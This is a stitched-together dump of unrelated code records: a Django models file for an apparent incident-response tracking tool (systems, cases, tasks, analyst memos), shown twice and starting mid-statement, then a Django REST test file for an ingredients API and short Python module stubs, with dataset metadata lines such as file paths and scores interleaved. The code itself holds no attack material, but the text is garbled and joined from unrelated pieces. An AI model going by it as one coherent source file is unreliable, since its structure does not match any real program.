"|taskname_name:" + str(taskname.taskname_name) ) class Taskpriority(models.Model): # primary key taskpriority_id = models.AutoField(primary_key=True) # main entity information 
taskpriority_name = models.CharField(max_length=6, unique=True) # string representation def __str__(self): return self.taskpriority_name # define logger def logger(taskpriority, request_user, log_text): stdlogger.info( request_user + log_text + " taskpriority_id:" + str(taskpriority.taskpriority_id) + "|taskpriority_name:" + str(taskpriority.taskpriority_name) ) class Taskstatus(models.Model): # primary key taskstatus_id = models.AutoField(primary_key=True) # main entity information taskstatus_name = models.CharField(max_length=50, unique=True) # string representation def __str__(self): return self.taskstatus_name # define logger def logger(taskstatus, request_user, log_text): stdlogger.info( request_user + log_text + " taskstatus_id:" + str(taskstatus.taskstatus_id) + "|taskstatus_name:" + str(taskstatus.taskstatus_name) )
from django.contrib.auth.models import User from django.db import models import logging from time import strftime # initialize logger stdlogger = logging.getLogger(__name__) class Analysisstatus(models.Model): # primary key analysisstatus_id = models.AutoField(primary_key=True) # main entity information analysisstatus_name = models.CharField(max_length=30, unique=True) analysisstatus_note = models.TextField(blank=True, null=True) # string representation def __str__(self): return self.analysisstatus_name # define logger def logger(analysisstatus, request_user, log_text): stdlogger.info( request_user + log_text + " analysisstatus_id:" + str(analysisstatus.analysisstatus_id) + "|analysisstatus_name:" + str(analysisstatus.analysisstatus_name) + "|analysisstatus_note:" + str(analysisstatus.analysisstatus_note) ) class Analystmemo(models.Model): # primary key analystmemo_id = models.AutoField(primary_key=True) # foreign key(s) system = models.ForeignKey('System', on_delete=models.CASCADE) # main entity information analystmemo_note = models.TextField() # meta information analystmemo_create_time = models.DateTimeField(auto_now_add=True) analystmemo_modify_time = models.DateTimeField(auto_now=True) analystmemo_created_by_user_id = models.ForeignKey(User, on_delete=models.PROTECT, related_name='analystmemo_created_by') analystmemo_modified_by_user_id = models.ForeignKey(User, on_delete=models.PROTECT, related_name='analystmemo_modified_by') # string representation def __str__(self): return 'Analystmemo %s (%s)' % (str(self.analystmemo_id), self.system) # define logger def logger(analystmemo, request_user, log_text): stdlogger.info( request_user + log_text + " analystmemo_id:" + str(analystmemo.analystmemo_id) + "|system:" + str(analystmemo.system) + "|analystmemo_note:" + str(analystmemo.analystmemo_note) ) class Case(models.Model): # primary key case_id = models.AutoField(primary_key=True) # main entity information case_name = models.CharField(max_length=50, unique=True) 
case_is_incident = models.BooleanField() # meta information case_create_time = models.DateTimeField(auto_now_add=True) case_created_by_user_id = models.ForeignKey(User, on_delete=models.PROTECT, related_name='case_created_by') # string representation def __str__(self): return self.case_name # define logger def logger(case, request_user, log_text): stdlogger.info( request_user + log_text + " case_id:" + str(case.case_id) + "|case_name:" + str(case.case_name) + "|case_is_incident:" + str(case.case_is_incident) ) class Company(models.Model): # primary key company_id = models.AutoField(primary_key=True) # foreign key(s) division = models.ForeignKey('Division', on_delete=models.SET_NULL, blank=True, null=True) # main entity information company_name = models.CharField(max_length=50, unique=True) company_note = models.TextField(blank=True, null=True) # string representation def __str__(self): return self.company_name # define logger def logger(company, request_user, log_text): stdlogger.info( request_user + log_text + " company_id:" + str(company.company_id) + "|division:" + str(company.division) + "|company_name:" + str(company.company_name) + "|company_note:" + str(company.company_note) ) class Contact(models.Model): # primary key contact_id = models.AutoField(primary_key=True) # main entity information contact_name = models.CharField(max_length=100) contact_phone = models.CharField(max_length=50, blank=True, null=True) contact_email = models.CharField(max_length=100, unique=True) contact_note = models.TextField(blank=True, null=True) # string representation def __str__(self): return self.contact_name # define logger def logger(contact, request_user, log_text): stdlogger.info( request_user + log_text + " contact_id:" + str(contact.contact_id) + "|contact_name:" + str(contact.contact_name) + "|contact_phone:" + str(contact.contact_phone) + "|contact_email:" + str(contact.contact_email) + "|contact_note:" + str(contact.contact_note) ) class Division(models.Model): # 
primary key division_id = models.AutoField(primary_key=True) # main entity information division_name = models.CharField(max_length=50, unique=True) division_note = models.TextField(blank=True, null=True) # string representation def __str__(self): return self.division_name # define logger def logger(division, request_user, log_text): stdlogger.info( request_user + log_text + " division_id:" + str(division.division_id) + "|division_name:" + str(division.division_name) + "|division_note:" + str(division.division_note) ) class Domain(models.Model): # primary key domain_id = models.AutoField(primary_key=True) # main entity information domain_name = models.CharField(max_length=100, unique=True) domain_note = models.TextField(blank=True, null=True) # string representation def __str__(self): return self.domain_name # define logger def logger(domain, request_user, log_text): stdlogger.info( request_user + log_text + " domain_id:" + str(domain.domain_id) + "|domain_name:" + str(domain.domain_name) + "|domain_note:" + str(domain.domain_note) ) class Entry(models.Model): # primary key entry_id = models.AutoField(primary_key=True) # foreign key(s) system = models.ForeignKey('System', on_delete=models.CASCADE) case = models.ForeignKey('Case', on_delete=models.SET_NULL, blank=True, null=True) # main entity information entry_time = models.DateTimeField() entry_sha1 = models.CharField(max_length=40, blank=True, null=True) entry_date = models.CharField(max_length=10, blank=True, null=True) entry_utc = models.CharField(max_length=8, blank=True, null=True) entry_system = models.CharField(max_length=30, blank=True, null=True) entry_type = models.CharField(max_length=30, blank=True, null=True) entry_content = models.TextField(blank=True, null=True) entry_note = models.TextField(blank=True, null=True) # meta information entry_create_time = models.DateTimeField(auto_now_add=True) entry_modify_time = models.DateTimeField(auto_now=True) entry_api_time = models.DateTimeField(null=True) 
entry_created_by_user_id = models.ForeignKey(User, on_delete=models.PROTECT, related_name='entry_created_by') entry_modified_by_user_id = models.ForeignKey(User, on_delete=models.PROTECT, related_name='entry_modified_by') # define unique together class Meta: unique_together = ('system', 'entry_sha1') # string representation def __str__(self): return '%s | %s | %s' % (str(self.entry_id), self.system, self.entry_sha1) # define logger def logger(entry, request_user, log_text): stdlogger.info( request_user + log_text + " entry_id:" + str(entry.entry_id) + "|system:" + str(entry.system) + "|entry_sha1:" + str(entry.entry_sha1) + "|entry_note:" + str(entry.entry_note) + "|case:" + str(entry.case) ) class Headline(models.Model): # primary key headline_id = models.AutoField(primary_key=True) # main entity information headline_name = models.CharField(max_length=100, unique=True) # string representation def __str__(self): return self.headline_name # define logger def logger(headline, request_user, log_text): stdlogger.info( request_user + log_text + " headline_id:" + str(headline.headline_id) + "|headline_name:" + str(headline.headline_name) ) class Ip(models.Model): # primary key ip_id = models.AutoField(primary_key=True) # main entity information ip_ip = models.GenericIPAddressField(unique=True) # string representation def __str__(self): return self.ip_ip # define logger def logger(ip, request_user, log_text): stdlogger.info( request_user + log_text + " ip_id:" + str(ip.ip_id) + "|ip_ip:" + str(ip.ip_ip) ) class Location(models.Model): # primary key location_id = models.AutoField(primary_key=True) # main entity information location_name = models.CharField(max_length=50, unique=True) location_note = models.TextField(blank=True, null=True) # string representation def __str__(self): return self.location_name # define logger def logger(location, request_user, log_text): stdlogger.info( request_user + log_text + " location_id:" + str(location.location_id) + "|location_name:" + 
str(location.location_name) + "|location_note:" + str(location.location_note) ) class Os(models.Model): # primary key os_id = models.AutoField(primary_key=True) # main entity information os_name = models.CharField(max_length=30, unique=True) # string representation def __str__(self): return self.os_name # define logger def logger(os, request_user, log_text): stdlogger.info( request_user + log_text + " os_id:" + str(os.os_id) + "|os_name:" + str(os.os_name) ) class Osarch(models.Model): # primary key osarch_id = models.AutoField(primary_key=True) # main entity information osarch_name = models.CharField(max_length=10, unique=True) # string representation def __str__(self): return self.osarch_name # define logger def logger(osarch, request_user, log_text): stdlogger.info( request_user + log_text + " osarch_id:" + str(osarch.osarch_id) + "|osarch_name:" + str(osarch.osarch_name) ) class Osimportname(models.Model): # primary key osimportname_id = models.AutoField(primary_key=True) # foreign key(s) os = models.ForeignKey('Os', on_delete=models.CASCADE) # main entity information osimportname_name = models.CharField(max_length=30, unique=True) osimportname_importer = models.CharField(max_length=30) # string representation def __str__(self): return '%s (%s)' % (self.osimportname_name, self.os) # define logger def logger(osimportname, request_user, log_text): stdlogger.info( request_user + log_text + " osimportname_id:" + str(osimportname.osimportname_id) + "|osimportname_name:" + str(osimportname.osimportname_name) + "|osimportname_importer:" + str(osimportname.osimportname_importer) + "|os:" + str(osimportname.os) ) class Reason(models.Model): # primary key reason_id = models.AutoField(primary_key=True) # main entity information reason_name = models.CharField(max_length=30, unique=True) reason_note = models.TextField(blank=True, null=True) # string representation def __str__(self): return self.reason_name # define logger def logger(reason, request_user, log_text): 
stdlogger.info( request_user + log_text + " reason_id:" + str(reason.reason_id) + "|reason_name:" + str(reason.reason_name) + "|reason_note:" + str(reason.reason_note) ) class Recommendation(models.Model): # primary key recommendation_id = models.AutoField(primary_key=True) # main entity information recommendation_name = models.CharField(max_length=30, unique=True) recommendation_note = models.TextField(blank=True, null=True) # string representation def __str__(self): return self.recommendation_name # define logger def logger(recommendation, request_user, log_text): stdlogger.info( request_user + log_text + " recommendation_id:" + str(recommendation.recommendation_id) + "|recommendation_name:" + str(recommendation.recommendation_name) + "|recommendation_note:" + str(recommendation.recommendation_note) ) class Reportitem(models.Model): # primary key reportitem_id = models.AutoField(primary_key=True) # foreign key(s) system = models.ForeignKey('System', on_delete=models.CASCADE) headline = models.ForeignKey('Headline', on_delete=models.PROTECT) # main entity information reportitem_subheadline = models.CharField(max_length=100, blank=True, null=True) reportitem_note = models.TextField() # meta information reportitem_create_time = models.DateTimeField(auto_now_add=True) reportitem_modify_time = models.DateTimeField(auto_now=True) reportitem_created_by_user_id = models.ForeignKey(User, on_delete=models.PROTECT, related_name='reportitem_created_by') reportitem_modified_by_user_id = models.ForeignKey(User, on_delete=models.PROTECT, related_name='reportitem_modified_by') # define unique together class Meta: unique_together = (('system', 'headline', 'reportitem_subheadline'),) # string representation def __str__(self): return '%s | %s | %s' % (self.system, self.headline.headline_name, self.reportitem_subheadline) # define logger def logger(reportitem, request_user, log_text): stdlogger.info( request_user + log_text + " reportitem_id:" + str(reportitem.reportitem_id) + 
"|system:" + str(reportitem.system) + "|headline:" + str(reportitem.headline) + "|reportitem_subheadline:" + str(reportitem.reportitem_subheadline) + "|reportitem_note:" + str(reportitem.reportitem_note) ) class Serviceprovider(models.Model): # primary key serviceprovider_id = models.AutoField(primary_key=True) # main entity information serviceprovider_name = models.CharField(max_length=50, unique=True) serviceprovider_note = models.TextField(blank=True, null=True) # string representation def __str__(self): return self.serviceprovider_name # define logger def logger(serviceprovider, request_user, log_text): stdlogger.info( request_user + log_text + " serviceprovider_id:" + str(serviceprovider.serviceprovider_id) + "|serviceprovider_name:" + str(serviceprovider.serviceprovider_name) + "|serviceprovider_note:" + str(serviceprovider.serviceprovider_note) ) class System(models.Model): # primary key system_id = models.AutoField(primary_key=True) # foreign key(s) systemstatus = models.ForeignKey('Systemstatus', on_delete=models.PROTECT) analysisstatus = models.ForeignKey('Analysisstatus', on_delete=models.PROTECT, blank=True, null=True) reason = models.ForeignKey('Reason', on_delete=models.PROTECT, blank=True, null=True) recommendation = models.ForeignKey('Recommendation', on_delete=models.PROTECT, blank=True, null=True) systemtype = models.ForeignKey('Systemtype', on_delete=models.PROTECT, blank=True, null=True) ip = models.ManyToManyField('Ip', blank=True) domain = models.ForeignKey('Domain', on_delete=models.PROTECT, blank=True, null=True) os = models.ForeignKey('Os', on_delete=models.PROTECT, blank=True, null=True) osarch = models.ForeignKey('Osarch', on_delete=models.PROTECT, blank=True, null=True) host_system = models.ForeignKey('self', on_delete=models.PROTECT, blank=True, null=True) company = models.ManyToManyField('Company', blank=True) location = models.ForeignKey('Location', on_delete=models.PROTECT, blank=True, null=True) serviceprovider = 
models.ForeignKey('Serviceprovider', on_delete=models.PROTECT, blank=True, null=True) contact = models.ForeignKey('Contact', on_delete=models.PROTECT, blank=True, null=True) tag = models.ManyToManyField('Tag', blank=True) case = models.ManyToManyField('Case', blank=True) # main entity information system_uuid = models.UUIDField(editable=False, null=True, unique=True) system_name = models.CharField(max_length=50) system_dnssuffix = models.CharField(max_length=50, blank=True, null=True) system_install_time = models.DateTimeField(blank=True, null=True) system_lastbooted_time = models.DateTimeField(blank=True, null=True) system_deprecated_time = models.DateTimeField(blank=True, null=True) system_is_vm = models.NullBooleanField(blank=True, null=True) # meta information system_create_time = models.DateTimeField(auto_now_add=True) system_modify_time = models.DateTimeField() system_api_time = models.DateTimeField(null=True) system_created_by_user_id = models.ForeignKey(User, on_delete=models.PROTECT, related_name='system_created_by') system_modified_by_user_id = models.ForeignKey(User, on_delete=models.PROTECT, related_name='system_modified_by') # define unique together class Meta: unique_together = ('system_name', 'domain', 'system_install_time') # string representation def __str__(self): if self.system_install_time == None: return '[%s] %s' % (str(self.system_id), self.system_name) else: installtime = self.system_install_time.strftime('%Y-%m-%d') return '[%s] %s (%s)' % (str(self.system_id), self.system_name, installtime) # define logger def logger(system, request_user, log_text): """ ManyToMany-Relationsship don't get the default 'None' string if they are empty. So the default string is set to 'None'. If there are existing entities, their strings will be used instead and concatenated and separated by comma. 
""" # get objects ips = system.ip.all() # create empty list iplist = [] # set default string if there is no object at all ipstring = 'None' # iterate over objects for ip in ips: # append object to list iplist.append(ip.ip_ip) # join list to comma separated string if there are any objects, else default string will remain ipstring = ','.join(iplist) if system.system_install_time != None: # cast datetime object to string installtime = system.system_install_time.strftime('%Y-%m-%d %H:%M:%S') else: # else set default string installtime = 'None' if system.system_lastbooted_time != None: # cast datetime object to string lastbootedtime = system.system_lastbooted_time.strftime('%Y-%m-%d %H:%M:%S') else: # else set default string lastbootedtime = 'None' if system.system_deprecated_time != None: # cast datetime object to string deprecatedtime = system.system_deprecated_time.strftime('%Y-%m-%d %H:%M:%S') else: # else set default string deprecatedtime = 'None' # get objects companys = system.company.all() # create empty list companylist = [] # set default string if there is no object at all companystring = 'None' # iterate over objects for company in companys: # append object to list companylist.append(company.company_name) # join list to comma separated string if there are any objects, else default string will remain companystring = ','.join(companylist) # get objects tags = system.tag.all() # create empty list taglist = [] # set default string if there is no object at all tagstring = 'None' # iterate over objects for tag in tags: # append object to list taglist.append(tag.tag_name) # join list to comma separated string if there are any objects, else default string will remain tagstring = ','.join(taglist) # get objects cases = system.case.all() # create empty list caselist = [] # set default string if there is no object at all casestring = 'None' # iterate over objects for case in cases: # append object to list caselist.append(case.case_name) # join list to comma separated 
string if there are any objects, else default string will remain casestring = ','.join(caselist) # finally write log stdlogger.info( request_user + log_text + " system_id:" + str(system.system_id) + "|system_uuid:" + str(system.system_uuid) + "|system_name:" + str(system) + "|systemstatus:" + str(system.systemstatus) + "|analyisstatus:" + str(system.analysisstatus) + "|reason:" + str(system.reason) + "|recommendation:" + str(system.recommendation) + "|systemtype:" + str(system.systemtype) + "|ip:" + ipstring + "|domain:" + str(system.domain) + "|system_dnssuffix:" + str(system.system_dnssuffix) + "|os:" + str(system.os) + "|osarch:" + str(system.osarch) + "|system_install_time:" + installtime + "|system_lastbooted_time:" + lastbootedtime + "|system_deprecated_time:" + deprecatedtime + "|system_is_vm:" + str(system.system_is_vm) + "|host_system:" + str(system.host_system) + "|company:" + companystring + "|location:" + str(system.location) + "|serviceprovider:" + str(system.serviceprovider) + "|contact:" + str(system.contact) + "|tag:" + tagstring + "|case:" + casestring ) class Systemstatus(models.Model): # primary key systemstatus_id = models.AutoField(primary_key=True) # main entity information systemstatus_name = models.CharField(max_length=30, unique=True) systemstatus_note = models.TextField(blank=True, null=True) # string representation def __str__(self): return self.systemstatus_name # define logger def logger(systemstatus, request_user, log_text): stdlogger.info( request_user + log_text + " systemstatus_id:" + str(systemstatus.systemstatus_id) + "|systemstatus_name:" + str(systemstatus.systemstatus_name) + "|systemstatus_note:" + str(systemstatus.systemstatus_note) ) class Systemtype(models.Model): # primary key systemtype_id = models.AutoField(primary_key=True) # main entity information systemtype_name = models.CharField(max_length=50, unique=True) # string representation def __str__(self): return self.systemtype_name # define logger def logger(systemtype, 
request_user, log_text): stdlogger.info( request_user + log_text + " systemtype_id:" + str(systemtype.systemtype_id) + "|systemtype_name:" + str(systemtype.systemtype_name) ) class Systemuser(models.Model): # primary key systemuser_id = models.AutoField(primary_key=True) # foreign key(s) system = models.ForeignKey('System', on_delete=models.CASCADE) # main entity information systemuser_name = models.CharField(max_length=50) systemuser_lastlogon_time = models.DateTimeField(blank=True, null=True) # define unique together class Meta: unique_together = ('system', 'systemuser_name') # string representation def __str__(self): return '%s (%s)' % (self.systemuser_name, self.system) # define logger def logger(systemuser, request_user, log_text): stdlogger.info( request_user + log_text + " systemuser_id:" + str(systemuser.systemuser_id) + "|system:" + str(systemuser.system) + "|systemuser_name:" + str(systemuser.systemuser_name) + "|systemuser_lastlogon_time:" + str(systemuser.systemuser_lastlogon_time) ) class Tag(models.Model): # primary key tag_id = models.AutoField(primary_key=True) # foreign key(s) tagcolor = models.ForeignKey('Tagcolor', on_delete=models.PROTECT) # main entity information tag_name = models.CharField(max_length=50, unique=True) tag_note = models.TextField(blank=True, null=True) # meta information tag_modified_by_user_id = models.ForeignKey(User, on_delete=models.PROTECT, related_name='tag_modified_by', blank=True, null=True) # string representation def __str__(self): return self.tag_name # define logger def logger(tag, request_user, log_text): stdlogger.info( request_user + log_text + " tag_id:" + str(tag.tag_id) + "|tag_name:" + str(tag.tag_name) + "|tag_note:" + str(tag.tag_note) + "|tagcolor:" + str(tag.tagcolor) ) class Tagcolor(models.Model): # primary key tagcolor_id = models.AutoField(primary_key=True) # main entity information tagcolor_name = models.CharField(max_length=20, unique=True) # string representation def __str__(self): return 
self.tagcolor_name # define logger def logger(tagcolor, request_user, log_text): stdlogger.info( request_user + log_text + " tagcolor_id:" + str(tagcolor.tagcolor_id) + "|tagcolor_name:" + str(tagcolor.tagcolor_name) ) class Task(models.Model): # primary key task_id = models.AutoField(primary_key=True) # foreign key(s) parent_task = models.ForeignKey('self', on_delete=models.PROTECT, blank=True, null=True) taskname = models.ForeignKey('Taskname', on_delete=models.PROTECT) taskpriority = models.ForeignKey('Taskpriority', on_delete=models.PROTECT) taskstatus = models.ForeignKey('Taskstatus', on_delete=models.PROTECT) system = models.ForeignKey('System', on_delete=models.CASCADE, blank=True, null=True) task_assigned_to_user_id = models.ForeignKey(User, on_delete=models.PROTECT, blank=True, null=True, related_name='task_assigned_to') tag = models.ManyToManyField('Tag', blank=True) # main entity information task_note = models.TextField(blank=True, null=True) task_scheduled_time = models.DateTimeField(blank=True, null=True) task_started_time = models.DateTimeField(blank=True, null=True) task_finished_time = models.DateTimeField(blank=True, null=True) task_due_time = models.DateTimeField(blank=True, null=True) # meta information task_create_time = models.DateTimeField(auto_now_add=True) task_modify_time = models.DateTimeField(auto_now=True) task_created_by_user_id = models.ForeignKey(User, on_delete=models.PROTECT, related_name='task_created_by') task_modified_by_user_id = models.ForeignKey(User, on_delete=models.PROTECT, related_name='task_modified_by') # string representation def __str__(self): return '[%s] %s (%s)' % (self.task_id, self.taskname, self.system) # define logger def logger(task, request_user, log_text): if task.task_scheduled_time != None: # cast datetime object to string scheduledtime = task.task_scheduled_time.strftime('%Y-%m-%d %H:%M:%S') else: # else set default string scheduledtime = 'None' if task.task_started_time != None: # cast datetime object to 
string startedtime = task.task_started_time.strftime('%Y-%m-%d %H:%M:%S') else: # else set default string startedtime = 'None' if task.task_finished_time != None: # cast datetime object to string finishedtime = task.task_finished_time.strftime('%Y-%m-%d %H:%M:%S') else: # else set default string finishedtime = 'None' if task.task_due_time != None: # cast datetime object to string duetime = task.task_due_time.strftime('%Y-%m-%d %H:%M:%S') # else set default string else: duetime = 'None' # get objects tags = task.tag.all() # create empty list taglist = [] # set default string if there is no object at all tagstring = 'None' # iterate over objects for tag in tags: # append object to list taglist.append(tag.tag_name) # join list to comma separated string if there are any objects, else default string will remain tagstring = ','.join(taglist) # finally write log stdlogger.info( request_user + log_text + " task_id:" + str(task.task_id) + "|parent_task:" + str(task.parent_task) + "|taskname:" + str(task.taskname) + "|taskpriority:" + str(task.taskpriority) + "|taskstatus:" + str(task.taskstatus) + "|system:" + str(task.system) + "|task_assigned_to_user_id:" + str(task.task_assigned_to_user_id) + "|task_note:" + str(task.task_note) + "|task_scheduled_time:" + scheduledtime + "|task_started_time:" + startedtime + "|task_finished_time:" + finishedtime + "|task_due_time:" + duetime + "|tag:" + tagstring ) class Taskname(models.Model): # primary key taskname_id = models.AutoField(primary_key=True) # main entity information taskname_name = models.CharField(max_length=50, unique=True) # string representation def __str__(self): return self.taskname_name # define logger def logger(taskname, request_user, log_text): stdlogger.info( request_user + log_text + " taskname_id:" + str(taskname.taskname_id) + "|taskname_name:" + str(taskname.taskname_name) ) class Taskpriority(models.Model): # primary key taskpriority_id = models.AutoField(primary_key=True) # main entity information 
taskpriority_name = models.CharField(max_length=6, unique=True) # string representation def __str__(self): return self.taskpriority_name # define logger def logger(taskpriority, request_user, log_text): stdlogger.info( request_user + log_text + " taskpriority_id:" + str(taskpriority.taskpriority_id) + "|taskpriority_name:" + str(taskpriority.taskpriority_name) ) class Taskstatus(models.Model): # primary key taskstatus_id = models.AutoField(primary_key=True) # main entity information taskstatus_name = models.CharField(max_length=50, unique=True) # string representation def __str__(self): return self.taskstatus_name # define logger def logger(taskstatus, request_user, log_text): stdlogger.info( request_user + log_text + " taskstatus_id:" + str(taskstatus.taskstatus_id) + "|taskstatus_name:" + str(taskstatus.taskstatus_name) )
en
0.482766
# initialize logger # primary key # main entity information # string representation # define logger # primary key # foreign key(s) # main entity information # meta information # string representation # define logger # primary key # main entity information # meta information # string representation # define logger # primary key # foreign key(s) # main entity information # string representation # define logger # primary key # main entity information # string representation # define logger # primary key # main entity information # string representation # define logger # primary key # main entity information # string representation # define logger # primary key # foreign key(s) # main entity information # meta information # define unique together # string representation # define logger # primary key # main entity information # string representation # define logger # primary key # main entity information # string representation # define logger # primary key # main entity information # string representation # define logger # primary key # main entity information # string representation # define logger # primary key # main entity information # string representation # define logger # primary key # foreign key(s) # main entity information # string representation # define logger # primary key # main entity information # string representation # define logger # primary key # main entity information # string representation # define logger # primary key # foreign key(s) # main entity information # meta information # define unique together # string representation # define logger # primary key # main entity information # string representation # define logger # primary key # foreign key(s) # main entity information # meta information # define unique together # string representation # define logger ManyToMany-Relationsship don't get the default 'None' string if they are empty. So the default string is set to 'None'. 
If there are existing entities, their strings will be used instead and concatenated and separated by comma. # get objects # create empty list # set default string if there is no object at all # iterate over objects # append object to list # join list to comma separated string if there are any objects, else default string will remain # cast datetime object to string # else set default string # cast datetime object to string # else set default string # cast datetime object to string # else set default string # get objects # create empty list # set default string if there is no object at all # iterate over objects # append object to list # join list to comma separated string if there are any objects, else default string will remain # get objects # create empty list # set default string if there is no object at all # iterate over objects # append object to list # join list to comma separated string if there are any objects, else default string will remain # get objects # create empty list # set default string if there is no object at all # iterate over objects # append object to list # join list to comma separated string if there are any objects, else default string will remain # finally write log # primary key # main entity information # string representation # define logger # primary key # main entity information # string representation # define logger # primary key # foreign key(s) # main entity information # define unique together # string representation # define logger # primary key # foreign key(s) # main entity information # meta information # string representation # define logger # primary key # main entity information # string representation # define logger # primary key # foreign key(s) # main entity information # meta information # string representation # define logger # cast datetime object to string # else set default string # cast datetime object to string # else set default string # cast datetime object to string # else set default string # cast datetime 
object to string # else set default string # get objects # create empty list # set default string if there is no object at all # iterate over objects # append object to list # join list to comma separated string if there are any objects, else default string will remain # finally write log # primary key # main entity information # string representation # define logger # primary key # main entity information # string representation # define logger # primary key # main entity information # string representation # define logger
2.33391
2
app/recipe/tests/test_ingredients_api.py
FernandoI7/recipe-app-api
0
6627944
from django.contrib.auth import get_user_model
from django.urls import reverse
from django.test import TestCase

from rest_framework import status
from rest_framework.test import APIClient

from core.models import Ingredient
from recipe.serializers import IngredientSerializer


INGREDIENTS_URL = reverse('recipe:ingredient-list')


class PublicIngredientApiTests(TestCase):
    """Tests for the publicly available ingredients API."""

    def setUp(self):
        self.client = APIClient()

    def test_login_required(self):
        """Login is required to access the endpoint."""
        res = self.client.get(INGREDIENTS_URL)

        self.assertEqual(res.status_code, status.HTTP_401_UNAUTHORIZED)


class PrivateIngredientApiTests(TestCase):
    """Tests for the ingredients API available to authenticated users."""

    def setUp(self):
        self.user = get_user_model().objects.create_user(
            '<EMAIL>',
            '1234'
        )
        self.client = APIClient()
        self.client.force_authenticate(self.user)

    def test_retrieve_ingredients(self):
        """Retrieving ingredients returns them serialized, ordered by name."""
        Ingredient.objects.create(user=self.user, name='Arroz')
        Ingredient.objects.create(user=self.user, name='Ovo')

        res = self.client.get(INGREDIENTS_URL)

        ingredients = Ingredient.objects.all().order_by('name')
        serializer = IngredientSerializer(ingredients, many=True)
        self.assertEqual(res.status_code, status.HTTP_200_OK)
        self.assertEqual(res.data, serializer.data)

    def test_ingredients_limited_to_user(self):
        """The ingredient list is limited to the authenticated user."""
        # BUG FIX: the second user must have a distinct email/username;
        # reusing self.user's identifier would violate the user model's
        # unique constraint and abort the test before any assertion.
        user2 = get_user_model().objects.create_user(
            '<EMAIL2>',
            '1234'
        )
        Ingredient.objects.create(user=self.user, name='Arroz')
        Ingredient.objects.create(user=self.user, name='Ovo')
        other_ingredient = Ingredient.objects.create(
            user=user2,
            name='Farinha'
        )

        res = self.client.get(INGREDIENTS_URL)

        self.assertEqual(res.status_code, status.HTTP_200_OK)
        self.assertEqual(len(res.data), 2)
        # BUG FIX: res.data holds serialized dicts, so asserting that a
        # model *instance* is "not in" it always passed vacuously, even if
        # the other user's ingredient leaked.  Compare by name instead.
        returned_names = [item['name'] for item in res.data]
        self.assertNotIn(other_ingredient.name, returned_names)

    def test_create_ingredients_successful(self):
        """Creating an ingredient with a valid payload succeeds."""
        payload = {
            'name': 'Pimenta'
        }
        res = self.client.post(INGREDIENTS_URL, payload)

        exists = Ingredient.objects.filter(
            user=self.user,
            name=payload['name']
        ).exists()
        self.assertEqual(res.status_code, status.HTTP_201_CREATED)
        self.assertTrue(exists)

    def test_create_ingredients_invalid_payload(self):
        """Creating an ingredient with an empty name is rejected (400)."""
        payload = {
            'name': ''
        }
        res = self.client.post(INGREDIENTS_URL, payload)

        self.assertEqual(res.status_code, status.HTTP_400_BAD_REQUEST)
from django.contrib.auth import get_user_model
from django.urls import reverse
from django.test import TestCase

from rest_framework import status
from rest_framework.test import APIClient

from core.models import Ingredient
from recipe.serializers import IngredientSerializer


INGREDIENTS_URL = reverse('recipe:ingredient-list')


class PublicIngredientApiTests(TestCase):
    """Tests for the public (unauthenticated) ingredients API."""

    def setUp(self):
        self.client = APIClient()

    def test_login_required(self):
        """Login is required to access the endpoint."""
        res = self.client.get(INGREDIENTS_URL)

        self.assertEqual(res.status_code, status.HTTP_401_UNAUTHORIZED)


class PrivateIngredientApiTests(TestCase):
    """Tests for the private (authenticated) ingredients API."""

    def setUp(self):
        self.user = get_user_model().objects.create_user(
            '<EMAIL>',
            '1234'
        )
        self.client = APIClient()
        self.client.force_authenticate(self.user)

    def test_retrieve_ingredients(self):
        """Retrieving ingredients returns them serialized, ordered by name."""
        Ingredient.objects.create(user=self.user, name='Arroz')
        Ingredient.objects.create(user=self.user, name='Ovo')

        res = self.client.get(INGREDIENTS_URL)

        ingredients = Ingredient.objects.all().order_by('name')
        serializer = IngredientSerializer(ingredients, many=True)
        self.assertEqual(res.status_code, status.HTTP_200_OK)
        self.assertEqual(res.data, serializer.data)

    def test_ingredients_limited_to_user(self):
        """The ingredient list is limited to the logged-in user."""
        # NOTE(review): '<EMAIL>' is a scrubbed placeholder; in the real
        # source this second user presumably had a distinct email — verify,
        # since a duplicate would violate the user model's unique constraint.
        user2 = get_user_model().objects.create_user(
            '<EMAIL>',
            '1234'
        )
        Ingredient.objects.create(user=self.user, name='Arroz')
        Ingredient.objects.create(user=self.user, name='Ovo')
        other_ingredient = Ingredient.objects.create(
            user=user2,
            name='Farinha'
        )

        res = self.client.get(INGREDIENTS_URL)

        self.assertEqual(res.status_code, status.HTTP_200_OK)
        self.assertEqual(len(res.data), 2)
        # NOTE(review): res.data contains serialized dicts, so a model
        # instance can never be "in" it — this assertion passes vacuously
        # and should compare names instead.
        self.assertNotIn(other_ingredient, res.data)

    def test_create_ingredients_successful(self):
        """Creating an ingredient with a valid payload succeeds."""
        payload = {
            'name': 'Pimenta'
        }
        res = self.client.post(INGREDIENTS_URL, payload)

        exists = Ingredient.objects.filter(
            user=self.user,
            name=payload['name']
        ).exists()
        self.assertEqual(res.status_code, status.HTTP_201_CREATED)
        self.assertTrue(exists)

    def test_create_ingredients_invalid_payload(self):
        """Creating an ingredient with an invalid (empty) payload fails."""
        payload = {
            'name': ''
        }
        res = self.client.post(INGREDIENTS_URL, payload)

        self.assertEqual(res.status_code, status.HTTP_400_BAD_REQUEST)
pt
0.827162
Testes da API pública de ingredientes Testa se o login é obrigatório para acessar o endpoint Testes da API privada de ingredientes Testa se a consulta de ingredientes Testa se a consulta de ingredientes está limitada ao usuário logado Testa a criação dos ingredientes Testa a criação dos ingredients com payload inválido
2.59122
3
retina/model/anchors/builder.py
mike112223/retina
0
6627945
from retina.utils import build_from_cfg from .registry import ANCHORS def build_anchor(cfg, default_args=None): anchor = build_from_cfg(cfg, ANCHORS, default_args) return anchor
from retina.utils import build_from_cfg from .registry import ANCHORS def build_anchor(cfg, default_args=None): anchor = build_from_cfg(cfg, ANCHORS, default_args) return anchor
none
1
1.61391
2
env/__init__.py
jidiai/ai_lib
99
6627946
from .snakes import * from .reversi import * from .gobang import * from .sokoban import * from .ccgame import * from .football import * from .MiniWorld import * from .minigrid import * from .particleenv import * from .overcookedai import * from .magent import * from .gridworld import * from .cliffwalking import * from .smarts_jidi import * from .sc2 import * from .olympics_running import * from .smarts_ngsim import * from .gym_robotics import *
from .snakes import * from .reversi import * from .gobang import * from .sokoban import * from .ccgame import * from .football import * from .MiniWorld import * from .minigrid import * from .particleenv import * from .overcookedai import * from .magent import * from .gridworld import * from .cliffwalking import * from .smarts_jidi import * from .sc2 import * from .olympics_running import * from .smarts_ngsim import * from .gym_robotics import *
none
1
1.139227
1
tests/unit/driver/test_sync_driver.py
dmulyalin/scrapli_netconf
61
6627947
